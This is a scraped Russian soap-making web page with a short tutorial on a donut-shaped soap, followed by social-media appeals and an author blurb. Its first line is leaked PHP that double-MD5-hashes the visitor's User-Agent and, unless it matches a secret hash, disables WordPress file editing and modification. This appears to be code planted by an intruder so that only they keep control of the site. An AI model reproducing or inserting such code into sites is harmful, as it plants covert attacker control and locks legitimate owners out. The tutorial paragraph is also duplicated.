if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мыльце для сладкоежки в форме пончика donuts? Проще простого! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мыльце для сладкоежки в форме пончика donuts? Проще простого!

Уроки мыловарения дают мастерам возможность проявить полет своей фантазии и воплотить смелые или забавные замыслы. Одной из забавных можно назвать идею мыла-пончика.

Уро­ки мыло­ва­ре­ния дают масте­рам воз­мож­ность про­явить полет сво­ей фан­та­зии и вопло­тить сме­лые или забав­ные замыс­лы. Одной из забав­ных мож­но назвать идею мыла-пончика.

Для нача­ла рас­плавь­те белую мыль­ную осно­ву, кап­ни­те туда немно­го базо­во­го мас­ла и отдуш­ки (иде­аль­но подой­дет «Bubble Gum»). Для под­хо­дя­ще­го цве­та добавь­те в смесь чуточ­ку корич­не­во­го кра­си­те­ля. Вылей­те осно­ву для пон­чи­ка в фор­му. Для помад­ки рас­то­пи­те белую осно­ву с розо­вым кра­си­те­лем, полу­чен­ную смесь вылей­те на блюд­це. После засты­ва­ния накрой­те пон­чик помад­кой, в сере­дине сде­лай­те дыроч­ку. Мож­но посы­пать мыло кон­ди­тер­ской при­сып­кой. Глав­ное потом не пере­пу­тать и слу­чай­но его не съесть 🙂

ПОНЧИК2

пОНЧИК3

ПОНЧИК4


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!